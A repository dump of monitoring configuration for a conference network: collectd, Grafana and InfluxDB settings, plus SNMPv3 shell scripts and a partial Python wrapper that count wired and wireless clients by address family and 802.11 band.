CollectSHM true 1253 | # CollectSMA false # Varnish 2 only 1254 | # CollectSMS false 1255 | # CollectSM false # Varnish 2 only 1256 | # CollectStruct false 1257 | # CollectTotals false 1258 | # CollectUptime false # Varnish 3 and above 1259 | # CollectdVCL false 1260 | # CollectVSM false # Varnish 4 only 1261 | # CollectWorkers false 1262 | # 1263 | # 1264 | # 1265 | # CollectCache true 1266 | # 1267 | # 1268 | 1269 | # 1270 | # Connection "xen:///" 1271 | # RefreshInterval 60 1272 | # Domain "name" 1273 | # BlockDevice "name:device" 1274 | # InterfaceDevice "name:device" 1275 | # IgnoreSelected false 1276 | # HostnameFormat name 1277 | # InterfaceFormat name 1278 | # PluginInstanceFormat name 1279 | # 1280 | 1281 | # 1282 | # Verbose false 1283 | # 1284 | 1285 | # 1286 | # 1287 | # Host "localhost" 1288 | # Port "2003" 1289 | # Protocol "tcp" 1290 | # LogSendErrors true 1291 | # Prefix "collectd" 1292 | # Postfix "collectd" 1293 | # StoreRates true 1294 | # AlwaysAppendDS false 1295 | # EscapeCharacter "_" 1296 | # 1297 | 
# 1298 | 1299 | # 1300 | # 1301 | # URL "http://example.com/collectd-post" 1302 | # User "collectd" 1303 | # Password "secret" 1304 | # VerifyPeer true 1305 | # VerifyHost true 1306 | # CACert "/etc/ssl/ca.crt" 1307 | # CAPath "/etc/ssl/certs/" 1308 | # ClientKey "/etc/ssl/client.pem" 1309 | # ClientCert "/etc/ssl/client.crt" 1310 | # ClientKeyPass "secret" 1311 | # SSLVersion "TLSv1" 1312 | # Format "Command" 1313 | # StoreRates false 1314 | # BufferSize 4096 1315 | # LowSpeedLimit 0 1316 | # Timeout 0 1317 | # 1318 | # 1319 | 1320 | # 1321 | # Property "metadata.broker.list" "localhost:9092" 1322 | # 1323 | # Format JSON 1324 | # 1325 | # 1326 | 1327 | # 1328 | # 1329 | # Host "localhost" 1330 | # Port 5555 1331 | # Protocol TCP 1332 | # Batch true 1333 | # BatchMaxSize 8192 1334 | # StoreRates true 1335 | # AlwaysAppendDS false 1336 | # TTLFactor 2.0 1337 | # Notifications true 1338 | # CheckThresholds false 1339 | # EventServicePrefix "" 1340 | # 1341 | # Tag "foobar" 1342 | # Attribute "foo" "bar" 1343 | # 1344 | 1345 | # 1346 | # 1347 | # Host "localhost" 1348 | # Port 3030 1349 | # StoreRates true 1350 | # AlwaysAppendDS false 1351 | # Notifications true 1352 | # Metrics true 1353 | # EventServicePrefix "" 1354 | # MetricHandler "influx" 1355 | # MetricHandler "default" 1356 | # NotificationHandler "flapjack" 1357 | # NotificationHandler "howling_monkey" 1358 | # 1359 | # Tag "foobar" 1360 | # Attribute "foo" "bar" 1361 | # 1362 | 1363 | # 1364 | # 1365 | # Host "localhost" 1366 | # Port "4242" 1367 | # HostTags "status=production" 1368 | # StoreRates false 1369 | # AlwaysAppendDS false 1370 | # 1371 | # 1372 | 1373 | # 1374 | # Host "localhost" 1375 | # Port "2181" 1376 | # 1377 | 1378 | 1379 | Filter "*.conf" 1380 | 1381 | 1382 | -------------------------------------------------------------------------------- /netmon_troopers/grafana.ini: -------------------------------------------------------------------------------- 1 | ###################### Grafana 
Configuration Example ##################### 2 | # 3 | # Everything has defaults so you only need to uncomment things you want to 4 | # change 5 | 6 | # possible values : production, development 7 | ; app_mode = production 8 | 9 | #################################### Paths #################################### 10 | [paths] 11 | # Path to where grafana can store temp files, sessions, and the sqlite3 db (if that is used) 12 | # 13 | ;data = /var/lib/grafana 14 | # 15 | # Directory where grafana can store logs 16 | # 17 | ;logs = /var/log/grafana 18 | 19 | #################################### Server #################################### 20 | [server] 21 | # Protocol (http or https) 22 | ;protocol = http 23 | 24 | # The ip address to bind to, empty will bind to all interfaces 25 | ;http_addr = 26 | http_addr = 127.0.0.1 27 | 28 | # The http port to use 29 | http_port = 8080 30 | 31 | # The public facing domain name used to access grafana from a browser 32 | ;domain = localhost 33 | 34 | # Redirect to the correct domain if the Host header does not match the configured domain 35 | # Prevents DNS rebinding attacks 36 | ;enforce_domain = false 37 | 38 | # The full public facing url 39 | ;root_url = %(protocol)s://%(domain)s:%(http_port)s/ 40 | 41 | # Log web requests 42 | ;router_logging = false 43 | 44 | # the static files path, relative to the working path 45 | ;static_root_path = public 46 | 47 | # enable gzip 48 | ;enable_gzip = false 49 | 50 | # https certs & key file 51 | ;cert_file = 52 | ;cert_key = 53 | 54 | #################################### Database #################################### 55 | [database] 56 | # Either "mysql", "postgres" or "sqlite3", it's your choice 57 | ;type = sqlite3 58 | ;host = 127.0.0.1:3306 59 | ;name = grafana 60 | ;user = root 61 | ;password = 62 | 63 | # For "postgres" only, either "disable", "require" or "verify-full" 64 | ;ssl_mode = disable 65 | 66 | # For "sqlite3" only, path relative to data_path setting 67 | ;path = grafana.db 68 | 69 | ####################################
Session #################################### 70 | [session] 71 | # Either "memory", "file", "redis", "mysql", "postgres", default is "file" 72 | ;provider = file 73 | 74 | # Provider config options 75 | # memory: has no config options yet 76 | # file: session dir path, is relative to grafana data_path 77 | # redis: config like redis server e.g. `addr=127.0.0.1:6379,pool_size=100,db=grafana` 78 | # mysql: go-sql-driver/mysql dsn config string, e.g. `user:password@tcp(127.0.0.1:3306)/database_name` 79 | # postgres: user=a password=b host=localhost port=5432 dbname=c sslmode=disable 80 | ;provider_config = sessions 81 | 82 | # Session cookie name 83 | ;cookie_name = grafana_sess 84 | 85 | # Set to true if sessions are used over https only; default is false 86 | ;cookie_secure = false 87 | 88 | # Session lifetime, default is 86400 89 | ;session_life_time = 86400 90 | 91 | #################################### Analytics #################################### 92 | [analytics] 93 | # Server reporting, sends usage counters to stats.grafana.org every 24 hours. 94 | # No ip addresses are being tracked, only simple counters to track 95 | # running instances, dashboard and error counts. It is very helpful to us. 96 | # Change this option to false to disable reporting.
97 | reporting_enabled = false 98 | 99 | # Google Analytics universal tracking code, only enabled if you specify an id here 100 | ;google_analytics_ua_id = 101 | 102 | #################################### Security #################################### 103 | [security] 104 | # default admin user, created on startup 105 | ;admin_user = admin 106 | 107 | # default admin password, can be changed before first start of grafana, or in profile settings 108 | ;admin_password = admin 109 | 110 | # used for signing; note that the line below is commented out with ';', so the $key placeholder is not applied and the built-in default stays in effect 111 | ;secret_key = $key 112 | 113 | # Auto-login remember days 114 | ;login_remember_days = 7 115 | ;cookie_username = grafana_user 116 | ;cookie_remember_name = grafana_remember 117 | 118 | # disable gravatar profile images 119 | disable_gravatar = true 120 | 121 | # data source proxy whitelist (ip_or_domain:port separated by spaces) 122 | ;data_source_proxy_whitelist = 123 | 124 | #################################### Users #################################### 125 | [users] 126 | # disable user signup / registration 127 | allow_sign_up = false 128 | 129 | # Allow non admin users to create organizations 130 | allow_org_create = false 131 | 132 | # Set to true to automatically assign new users to the default organization (id 1) 133 | ;auto_assign_org = true 134 | 135 | # Default role new users will be automatically assigned (if auto_assign_org above is set to true) 136 | ;auto_assign_org_role = Viewer 137 | 138 | # Background text for the user field on the login page 139 | login_hint = username 140 | 141 | #################################### Anonymous Auth ########################## 142 | [auth.anonymous] 143 | # enable anonymous access 144 | enabled = true 145 | 146 | # specify organization name that should be used for unauthenticated users 147 | org_name = Troopers 148 | 149 | # specify role for unauthenticated users 150 | org_role = Viewer 151 | 152 | #################################### Github Auth ########################## 153 | [auth.github] 154 | enabled = false
155 | ;allow_sign_up = false 156 | ;client_id = some_id 157 | ;client_secret = some_secret 158 | ;scopes = user:email,read:org 159 | ;auth_url = https://github.com/login/oauth/authorize 160 | ;token_url = https://github.com/login/oauth/access_token 161 | ;api_url = https://api.github.com/user 162 | ;team_ids = 163 | ;allowed_organizations = 164 | 165 | #################################### Google Auth ########################## 166 | [auth.google] 167 | enabled = false 168 | ;allow_sign_up = false 169 | ;client_id = some_client_id 170 | ;client_secret = some_client_secret 171 | ;scopes = https://www.googleapis.com/auth/userinfo.profile https://www.googleapis.com/auth/userinfo.email 172 | ;auth_url = https://accounts.google.com/o/oauth2/auth 173 | ;token_url = https://accounts.google.com/o/oauth2/token 174 | ;api_url = https://www.googleapis.com/oauth2/v1/userinfo 175 | ;allowed_domains = 176 | 177 | #################################### Auth Proxy ########################## 178 | [auth.proxy] 179 | enabled = false 180 | ;header_name = X-WEBAUTH-USER 181 | ;header_property = username 182 | ;auto_sign_up = true 183 | 184 | #################################### Basic Auth ########################## 185 | [auth.basic] 186 | enabled = true 187 | 188 | #################################### Auth LDAP ########################## 189 | [auth.ldap] 190 | enabled = false 191 | ;config_file = /etc/grafana/ldap.toml 192 | 193 | #################################### SMTP / Emailing ########################## 194 | [smtp] 195 | ;enabled = false 196 | ;host = localhost:25 197 | ;user = 198 | ;password = 199 | ;cert_file = 200 | ;key_file = 201 | ;skip_verify = false 202 | ;from_address = admin@grafana.localhost 203 | 204 | [emails] 205 | ;welcome_email_on_sign_up = false 206 | 207 | #################################### Logging ########################## 208 | [log] 209 | # Either "console", "file", default is "console" 210 | # Use comma to separate multiple modes, e.g. 
"console, file" 211 | mode = console, file 212 | 213 | # Buffer length of channel, keep it as it is if you don't know what it is. 214 | ;buffer_len = 10000 215 | 216 | # Either "Trace", "Debug", "Info", "Warn", "Error", "Critical", default is "Trace" 217 | level = Info 218 | 219 | # For "console" mode only 220 | [log.console] 221 | ;level = 222 | 223 | # For "file" mode only 224 | [log.file] 225 | ;level = 226 | # This enables automated log rotate(switch of following options), default is true 227 | ;log_rotate = true 228 | 229 | # Max line number of single file, default is 1000000 230 | ;max_lines = 1000000 231 | 232 | # Max size shift of single file, default is 28 means 1 << 28, 256MB 233 | ;max_lines_shift = 28 234 | 235 | # Segment log daily, default is true 236 | ;daily_rotate = true 237 | 238 | # Expired days of log file(delete after max days), default is 7 239 | ;max_days = 7 240 | 241 | #################################### AMPQ Event Publisher ########################## 242 | [event_publisher] 243 | ;enabled = false 244 | ;rabbitmq_url = amqp://localhost/ 245 | ;exchange = grafana_events 246 | 247 | ;#################################### Dashboard JSON files ########################## 248 | [dashboards.json] 249 | enabled = true 250 | ;path = /var/lib/grafana/dashboards 251 | 252 | 253 | 254 | -------------------------------------------------------------------------------- /netmon_troopers/influxdb.conf: -------------------------------------------------------------------------------- 1 | ### Welcome to the InfluxDB configuration file. 2 | 3 | # Once every 24 hours InfluxDB will report anonymous data to m.influxdb.com 4 | # The data includes raft id (random 8 bytes), os, arch, version, and metadata. 5 | # We don't track ip addresses of servers reporting. This is only used 6 | # to track the number of instances running and the versions, which 7 | # is very helpful for us. 8 | # Change this option to true to disable reporting. 
9 | reporting-disabled = true 10 | 11 | # we'll try to get the hostname automatically, but if the OS returns something 12 | # that isn't resolvable by other servers in the cluster, use this option to 13 | # manually set the hostname 14 | # hostname = "localhost" 15 | 16 | ### 17 | ### [meta] 18 | ### 19 | ### Controls the parameters for the Raft consensus group that stores metadata 20 | ### about the InfluxDB cluster. 21 | ### 22 | 23 | [meta] 24 | # Controls if this node should run the metaservice and participate in the Raft group 25 | enabled = true 26 | 27 | # Where the metadata/raft database is stored 28 | dir = "/var/lib/influxdb/meta" 29 | 30 | bind-address = "127.0.0.1:8088" 31 | retention-autocreate = true 32 | election-timeout = "1s" 33 | heartbeat-timeout = "1s" 34 | leader-lease-timeout = "500ms" 35 | commit-timeout = "50ms" 36 | cluster-tracing = false 37 | 38 | ### 39 | ### [data] 40 | ### 41 | ### Controls where the actual shard data for InfluxDB lives and how it is 42 | ### flushed from the WAL. "dir" may need to be changed to a suitable place 43 | ### for your system, but the WAL settings are an advanced configuration. The 44 | ### defaults should work for most systems. 45 | ### 46 | 47 | [data] 48 | # Controls if this node holds time series data shards in the cluster 49 | enabled = true 50 | 51 | dir = "/var/lib/influxdb/data" 52 | 53 | # The following WAL settings are for the b1 storage engine used in 0.9.2. They won't 54 | # apply to any new shards created after upgrading to a version > 0.9.3. 55 | max-wal-size = 104857600 # Maximum size the WAL can reach before a flush. Defaults to 100MB. 56 | wal-flush-interval = "10m" # Maximum time data can sit in WAL before a flush. 57 | wal-partition-flush-delay = "2s" # The delay time between each WAL partition being flushed.
58 | 59 | # These are the WAL settings for the storage engine >= 0.9.3 60 | wal-dir = "/var/lib/influxdb/wal" 61 | wal-logging-enabled = true 62 | data-logging-enabled = true 63 | 64 | # When a series in the WAL in-memory cache reaches this size in bytes it is marked as ready to 65 | # flush to the index 66 | # wal-ready-series-size = 25600 67 | 68 | # Flush and compact a partition once this ratio of series are over the ready size 69 | # wal-compaction-threshold = 0.6 70 | 71 | # Force a flush and compaction if any series in a partition gets above this size in bytes 72 | # wal-max-series-size = 2097152 73 | 74 | # Force a flush of all series and full compaction if there have been no writes in this 75 | # amount of time. This is useful for ensuring that shards that are cold for writes don't 76 | # keep a bunch of data cached in memory and in the WAL. 77 | # wal-flush-cold-interval = "10m" 78 | 79 | # Force a partition to flush its largest series if it reaches this approximate size in 80 | # bytes. Remember there are 5 partitions so you'll need at least 5x this amount of memory. 81 | # The more memory you have, the bigger this can be. 82 | # wal-partition-size-threshold = 20971520 83 | 84 | # Whether queries should be logged before execution. Very useful for troubleshooting, but will 85 | # log any sensitive data contained within a query. 86 | # query-log-enabled = true 87 | 88 | # Settings for the TSM engine 89 | 90 | # CacheMaxMemorySize is the maximum size a shard's cache can 91 | # reach before it starts rejecting writes. 
92 | # cache-max-memory-size = 524288000 93 | 94 | # CacheSnapshotMemorySize is the size at which the engine will 95 | # snapshot the cache and write it to a TSM file, freeing up memory 96 | # cache-snapshot-memory-size = 26214400 97 | 98 | # CacheSnapshotWriteColdDuration is the length of time at 99 | # which the engine will snapshot the cache and write it to 100 | # a new TSM file if the shard hasn't received writes or deletes 101 | # cache-snapshot-write-cold-duration = "1h" 102 | 103 | # MinCompactionFileCount is the minimum number of TSM files 104 | # that need to exist before a compaction cycle will run 105 | # compact-min-file-count = 3 106 | 107 | # CompactFullWriteColdDuration is the duration at which the engine 108 | # will compact all TSM files in a shard if it hasn't received a 109 | # write or delete 110 | # compact-full-write-cold-duration = "24h" 111 | 112 | # MaxPointsPerBlock is the maximum number of points in an encoded 113 | # block in a TSM file. Larger numbers may yield better compression 114 | # but could incur a performance penalty when querying 115 | # max-points-per-block = 1000 116 | 117 | ### 118 | ### [hinted-handoff] 119 | ### 120 | ### Controls the hinted handoff feature, which allows nodes to temporarily 121 | ### store queued data when one node of a cluster is down for a short period 122 | ### of time. 123 | ### 124 | 125 | [hinted-handoff] 126 | enabled = true 127 | dir = "/var/lib/influxdb/hh" 128 | max-size = 1073741824 129 | max-age = "168h" 130 | retry-rate-limit = 0 131 | 132 | # Hinted handoff will start retrying writes to down nodes at a rate of once per second. 133 | # If any error occurs, it will back off exponentially until the interval 134 | # reaches retry-max-interval. Once writes to all nodes are successfully completed the 135 | # interval will reset to retry-interval. 136 | retry-interval = "1s" 137 | retry-max-interval = "1m" 138 | 139 | # Interval between running checks for data that should be purged.
Data is purged from 140 | # hinted-handoff queues for two reasons. 1) The data is older than the max age, or 141 | # 2) the target node has been dropped from the cluster. Data is never dropped until 142 | # it has reached max-age, however, whether the target node was dropped or not. 143 | purge-interval = "1h" 144 | 145 | ### 146 | ### [cluster] 147 | ### 148 | ### Controls non-Raft cluster behavior, which generally includes how data is 149 | ### shared across shards. 150 | ### 151 | 152 | [cluster] 153 | shard-writer-timeout = "5s" # The time within which a remote shard must respond to a write request. 154 | write-timeout = "10s" # The time within which a write request must complete on the cluster. 155 | 156 | ### 157 | ### [retention] 158 | ### 159 | ### Controls the enforcement of retention policies for evicting old data. 160 | ### 161 | 162 | [retention] 163 | enabled = true 164 | check-interval = "30m" 165 | 166 | ### 167 | ### [shard-precreation] 168 | ### 169 | ### Controls the precreation of shards, so they are available before data arrives. 170 | ### Only shards that, after creation, will have both a start- and end-time in the 171 | ### future, will ever be created. Shards are never precreated that would be wholly 172 | ### or partially in the past. 173 | 174 | [shard-precreation] 175 | enabled = true 176 | check-interval = "10m" 177 | advance-period = "30m" 178 | 179 | ### 180 | ### Controls the system self-monitoring, statistics and diagnostics. 181 | ### 182 | ### The internal database for monitoring data is created automatically 183 | ### if it does not already exist. The target retention within this database 184 | ### is called 'monitor' and is also created with a retention period of 7 days 185 | ### and a replication factor of 1, if it does not exist. In all cases 186 | ### this retention policy is configured as the default for the database. 187 | 188 | [monitor] 189 | store-enabled = true # Whether to record statistics internally.
190 | store-database = "_internal" # The destination database for recorded statistics 191 | store-interval = "10s" # The interval at which to record statistics 192 | 193 | ### 194 | ### [admin] 195 | ### 196 | ### Controls the availability of the built-in, web-based admin interface. If HTTPS is 197 | ### enabled for the admin interface, HTTPS must also be enabled on the [http] service. 198 | ### 199 | 200 | [admin] 201 | enabled = true # Extra attack surface on a node that only needs the API; disable it when it is not actively used. 202 | bind-address = "127.0.0.1:8083" # Loopback only. With https-enabled = false below, do not bind this to a reachable address without first enabling HTTPS here and on [http]. 203 | https-enabled = false 204 | https-certificate = "/etc/ssl/influxdb.pem" 205 | 206 | ### 207 | ### [http] 208 | ### 209 | ### Controls how the HTTP endpoints are configured. These are the primary 210 | ### mechanism for getting data into and out of InfluxDB. 211 | ### 212 | 213 | [http] 214 | enabled = true 215 | bind-address = "127.0.0.1:8086" # Loopback only. auth-enabled protects the API only if credentials cannot be sniffed: with https-enabled = false they travel in cleartext, which is acceptable solely because nothing off-host can reach this listener. Enable HTTPS before binding to any other address. 216 | auth-enabled = true 217 | log-enabled = true 218 | write-tracing = false 219 | pprof-enabled = false # Keep disabled outside debugging sessions; it exposes Go runtime profiling endpoints on this listener. 220 | https-enabled = false 221 | https-certificate = "/etc/ssl/influxdb.pem" 222 | 223 | 224 | ### 225 | ### [[graphite]] 226 | ### 227 | ### Controls one or many listeners for Graphite data. 228 | ### 229 | 230 | [[graphite]] 231 | enabled = false 232 | # database = "graphite" 233 | # bind-address = ":2003" 234 | # protocol = "tcp" 235 | # consistency-level = "one" 236 | # name-separator = "." 237 | 238 | # These next lines control how batching works. You should have this enabled 239 | # otherwise you could get dropped metrics or poor performance. Batching 240 | # will buffer points in memory if you have many coming in. 241 | 242 | # batch-size = 1000 # will flush if this many points get buffered 243 | # batch-pending = 5 # number of batches that may be pending in memory 244 | # batch-timeout = "1s" # will flush at least this often even if we haven't hit buffer limit 245 | # udp-read-buffer = 0 # UDP Read buffer size, 0 means OS default. UDP listener will fail if set above OS max.
246 | 247 | ## "name-schema" configures tag names for parsing the metric name from graphite protocol; 248 | ## separated by `name-separator`. 249 | ## The "measurement" tag is special and the corresponding field will become 250 | ## the name of the metric. 251 | ## e.g. "type.host.measurement.device" will parse "server.localhost.cpu.cpu0" as 252 | ## { 253 | ## measurement: "cpu", 254 | ## tags: { 255 | ## "type": "server", 256 | ## "host": "localhost", 257 | ## "device": "cpu0" 258 | ## } 259 | ## } 260 | # name-schema = "type.host.measurement.device" 261 | 262 | ## If set to true, when the input metric name has more fields than `name-schema` specified, 263 | ## the extra fields will be ignored. 264 | ## Otherwise an error will be logged and the metric rejected. 265 | # ignore-unnamed = true 266 | 267 | ### 268 | ### [collectd] 269 | ### 270 | ### Controls the listener for collectd data. 271 | ### 272 | 273 | [collectd] 274 | enabled = true 275 | bind-address = "127.0.0.1:25001" # Loopback only. This is an unauthenticated UDP listener: anything that can reach it can write into the "collectd" database, so keep it on localhost or a trusted management network. 276 | database = "collectd" 277 | typesdb = "/usr/share/collectd/types.db" 278 | # bind-address = "" 279 | # database = "" 280 | # typesdb = "" 281 | 282 | # These next lines control how batching works. You should have this enabled 283 | # otherwise you could get dropped metrics or poor performance. Batching 284 | # will buffer points in memory if you have many coming in. 285 | 286 | # batch-size = 1000 # will flush if this many points get buffered 287 | # batch-pending = 5 # number of batches that may be pending in memory 288 | # batch-timeout = "1s" # will flush at least this often even if we haven't hit buffer limit 289 | # read-buffer = 0 # UDP Read buffer size, 0 means OS default. UDP listener will fail if set above OS max. 290 | 291 | ### 292 | ### [opentsdb] 293 | ### 294 | ### Controls the listener for OpenTSDB data.
295 | ### 296 | 297 | [opentsdb] 298 | enabled = false 299 | # bind-address = ":4242" 300 | # database = "opentsdb" 301 | # retention-policy = "" 302 | # consistency-level = "one" 303 | # tls-enabled = false 304 | # certificate= "" 305 | # log-point-errors = true # Log an error for every malformed point. 306 | 307 | # These next lines control how batching works. You should have this enabled 308 | # otherwise you could get dropped metrics or poor performance. Only points 309 | # metrics received over the telnet protocol undergo batching. 310 | 311 | # batch-size = 1000 # will flush if this many points get buffered 312 | # batch-pending = 5 # number of batches that may be pending in memory 313 | # batch-timeout = "1s" # will flush at least this often even if we haven't hit buffer limit 314 | 315 | ### 316 | ### [[udp]] 317 | ### 318 | ### Controls the listeners for InfluxDB line protocol data via UDP. 319 | ### 320 | ### [logstash] 321 | ### 322 | 323 | [[udp]] 324 | enabled = false 325 | # database = "udp" 326 | # retention-policy = "" 327 | 328 | # These next lines control how batching works. You should have this enabled 329 | # otherwise you could get dropped metrics or poor performance. Batching 330 | # will buffer points in memory if you have many coming in. 331 | 332 | # batch-size = 1000 # will flush if this many points get buffered 333 | # batch-pending = 5 # number of batches that may be pending in memory 334 | # batch-timeout = "1s" # will flush at least this often even if we haven't hit buffer limit 335 | # read-buffer = 0 # UDP Read buffer size, 0 means OS default. UDP listener will fail if set above OS max. 336 | 337 | # set the expected UDP payload size; lower values tend to yield better performance, default is max UDP size 65536 338 | # udp-payload-size = 65536 339 | 340 | ### 341 | ### [continuous_queries] 342 | ### 343 | ### Controls how continuous queries are run within InfluxDB. 
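###

[continuous_queries]
log-enabled = true
enabled = true
# run-interval = "1s" # interval for how often continuous queries will be checked if they need to run
-------------------------------------------------------------------------------- /netmon_troopers/screenshots/grafana_dashboard_netmon_troopers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ernw/insinuator-snippets/837feffb79db74cc1566541c3373db315e817ba0/netmon_troopers/screenshots/grafana_dashboard_netmon_troopers.png -------------------------------------------------------------------------------- /netmon_troopers/screenshots/grafana_dashboard_netmon_troopers_bandwidth.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ernw/insinuator-snippets/837feffb79db74cc1566541c3373db315e817ba0/netmon_troopers/screenshots/grafana_dashboard_netmon_troopers_bandwidth.png -------------------------------------------------------------------------------- /netmon_troopers/scripts/cisco_arp_nbc.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Dump the router's ARP table (IPv4) or neighbor cache (IPv6) for one VLAN
# interface via SNMPv3 and print the physical addresses on a single line.
#
# Usage: cisco_arp_nbc.sh <arp_v10|arp_v10-old|arp_v20|arp_v30|arp_v40|nbc_v10|nbc_v20|nbc_v30|nbc_v30_2|nbc_v40>
#
# Target, SNMPv3 user and passphrases are taken from the environment
# ($IPv6 / $IPv4, $user, $Passphrase); the published values were redacted.
#
# SECURITY NOTE: -A/-X put both SNMPv3 passphrases on the snmpwalk command
# line, where every local user can read them via `ps` or /proc/<pid>/cmdline
# for the duration of each walk. On a shared monitoring host move them into
# ~/.snmp/snmp.conf (defAuthPassphrase / defPrivPassphrase, mode 0600) and
# drop the -A/-X arguments from walk() below.
ROUTERIP="udp6:[$IPv6]"
#ROUTERIP="$IPv4"
ROUTERUSER="$user"
ROUTERAUTH="$Passphrase"   # auth and priv share one secret here; distinct secrets are preferable if the router allows it
ROUTERPASS="$Passphrase"
# ifIndex of each VLAN interface on the router
VLAN10="8"
VLAN20="9"
VLAN30="10"
VLAN40="12"
SNMPWALK=$(command -v snmpwalk)

# ipNetToMediaPhysAddress: legacy, IPv4-only ARP table
ARP_OLD="1.3.6.1.2.1.4.22.1.2"
# ipNetToPhysicalPhysAddress: address-family aware table; the .ipv4/.ipv6
# suffix selects the family
NTP="1.3.6.1.2.1.4.35.1.4"

# walk <oid>: SNMPv3 authPriv (SHA/AES) walk of one OID subtree, raw output.
# Everything is quoted: ROUTERIP contains "[" / "]", which an unquoted
# expansion would hand to the shell's glob matcher.
walk() {
    "$SNMPWALK" -v3 -u "$ROUTERUSER" -l authPriv -a sha -A "$ROUTERAUTH" -x aes -X "$ROUTERPASS" "$ROUTERIP" "$1"
}

# values <oid>: like walk, but only the value column, collapsed onto one
# space-separated line. The unquoted echo is deliberate — the Python caller
# splits the output on whitespace.
values() {
    local out
    out=$(walk "$1" | awk -F ': ' '{ print $2 }')
    echo $out
}

# VLAN 20 does not matter for the dashboard (kept for completeness)

case "$1" in
    arp_v10-old) values "$ARP_OLD.$VLAN10" ;;
    arp_v10)     values "$NTP.$VLAN10.ipv4" ;;
    arp_v30)     values "$ARP_OLD.$VLAN30" ;;
    arp_v20)     values "$ARP_OLD.$VLAN20" ;;
    arp_v40)     values "$NTP.$VLAN40.ipv4" ;;
    nbc_v10)     values "$NTP.$VLAN10.ipv6" ;;
    nbc_v30)     values "$NTP.$VLAN30.ipv6" ;;
    nbc_v30_2)   walk   "$NTP.$VLAN30.ipv6" ;;   # raw, unfiltered walk for debugging
    nbc_v20)     values "$NTP.$VLAN20.ipv6" ;;
    nbc_v40)     values "$NTP.$VLAN40.ipv6" ;;
esac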
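#$ROUTERINT1 #|awk -F ': ' '{ print $2 }'
#snmpwalk -v3 -u $ROUTERUSER -l authPriv -a sha -A $ROUTERAUTH -x aes -X $ROUTERPASS $ROUTERIP .1.3.6.1.2.1.4.29 #.1.6 #$ROUTERINT1 #|awk -F ': ' '{ print $2 }'
#snmpwalk -v3 -u $ROUTERUSER -l authPriv -a sha -A $ROUTERAUTH -x aes -X $ROUTERPASS $ROUTERIP .1.3.6.1.2.1.4.30 #.1.6 #$ROUTERINT1 #|awk -F ': ' '{ print $2 }'
-------------------------------------------------------------------------------- /netmon_troopers/scripts/cisco_wlc_bands.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Count the wireless clients currently associated to the Cisco WLC, grouped by
# the 802.11 protocol each client uses, and print one line:
#   <dot11a>:<dot11b>:<dot11g>:<dot11n24>:<dot11n5>
# (consumed by snmp_gw_wlc_troopers.py).
#
# Target, SNMPv3 user and passphrases come from the environment
# ($IPv6 / $IPv4, $user, $Passphrase); the published values were redacted.
#
# SECURITY NOTE: -A/-X put both SNMPv3 passphrases on the snmpwalk command
# line, where every local user can read them via `ps` or /proc/<pid>/cmdline
# while the walk runs. On a shared host prefer ~/.snmp/snmp.conf
# (defAuthPassphrase / defPrivPassphrase, mode 0600) and drop -A/-X here.
WLCIP="udp6:[$IPv6]"
#WLCIP="$IPv4"
WLCUSER="$user"
WLCAUTH="$Passphrase"
WLCPASS="$Passphrase"
SNMPWALK=$(command -v snmpwalk)

# Per-client protocol column of the WLC's mobile station table
# (AIRESPACE-WIRELESS-MIB, bsnMobileStationProtocol). The codes are mapped
# below exactly as the original script did: 1=802.11a, 2=802.11b, 3=802.11g,
# 6=802.11n 2.4 GHz, 7=802.11n 5 GHz — verify against your controller's MIB.
PROTOCOL_OID="1.3.6.1.4.1.14179.2.1.4.1.25"

clientsA=0
clientsB=0
clientsG=0
clients24N=0
clients5N=0

# Quoted throughout: WLCIP contains "[" / "]", which an unquoted expansion
# would hand to the shell's glob matcher.
data=$("$SNMPWALK" -v3 -u "$WLCUSER" -l authPriv -a sha -A "$WLCAUTH" -x aes -X "$WLCPASS" "$WLCIP" "$PROTOCOL_OID" | awk -F ': ' '{ print $2 }')

for proto in $data; do
    case "$proto" in
        1) clientsA=$((clientsA + 1)) ;;
        2) clientsB=$((clientsB + 1)) ;;
        3) clientsG=$((clientsG + 1)) ;;
        6) clients24N=$((clients24N + 1)) ;;
        7) clients5N=$((clients5N + 1)) ;;
        *) ;;   # other / unknown protocol codes are not counted, as before
    esac
done

echo "$clientsA:$clientsB:$clientsG:$clients24N:$clients5N"
-------------------------------------------------------------------------------- /netmon_troopers/scripts/snmp_gw_wlc_troopers.py: --------------------------------------------------------------------------------
#!/usr/bin/python
"""Client counters for the Troopers conference network.

Drives the two SNMP helper scripts (cisco_arp_nbc.sh for the router's ARP /
IPv6 neighbor caches, cisco_wlc_bands.sh for the WLC) and prints either one
number or a batch of collectd ``PUTVAL`` lines, depending on the positional
argument.

Hosts are identified by the physical (MAC) address the router has cached for
them: a MAC present in both the IPv4 and the IPv6 table is a dual-stack
client, one present in only one table is single-stack.

Security notes:
  * The helpers run without a shell and with a fixed argument list; the only
    user-controlled value (argv[1]) is compared against keywords and never
    becomes part of a command.
  * ``$user`` in SCRIPT_DIR is expanded from the environment at run time
    (the published path was redacted; the original relied on the shell for
    the same expansion). Use an absolute path in production. If the variable
    is unset the helpers are simply not found and every count is 0.
"""
import argparse
import os
import subprocess

SCRIPT_DIR = os.path.expandvars("/home/$user/scripts")
ARP_SCRIPT = os.path.join(SCRIPT_DIR, "cisco_arp_nbc.sh")
WLC_SCRIPT = os.path.join(SCRIPT_DIR, "cisco_wlc_bands.sh")

# Index layout of the list returned for clients="collectd".
IPV4_ONLY, DUALSTACK, IPV6_ONLY = 0, 1, 2

# Column order of cisco_wlc_bands.sh's output.
_BAND_KEYS = ("dot11a", "dot11b", "dot11g", "dot11n24", "dot11n5")


def _run(script, *args):
    """Run *script* via ``sh`` with *args*; return its stdout, exit status ignored (as os.popen did)."""
    proc = subprocess.Popen(["sh", script] + list(args), stdout=subprocess.PIPE)
    out, _ = proc.communicate()
    return out


def _addresses(mode):
    """Return the set of physical addresses cisco_arp_nbc.sh prints for *mode* (e.g. ``arp_v10``, ``nbc_v30``)."""
    return set(_run(ARP_SCRIPT, mode).split())


def _client_counts(arp_mode, nbc_modes):
    """Classify the hosts of one VLAN (or a union of VLANs) by address family.

    Args:
        arp_mode: helper keyword for the IPv4 ARP table.
        nbc_modes: helper keywords for the IPv6 neighbor caches to union.

    Returns:
        ``[ipv4_only, dualstack, ipv6_only]`` host counts.
    """
    ipv4 = _addresses(arp_mode)
    ipv6 = set()
    for mode in nbc_modes:
        ipv6 |= _addresses(mode)
    dual = ipv4 & ipv6
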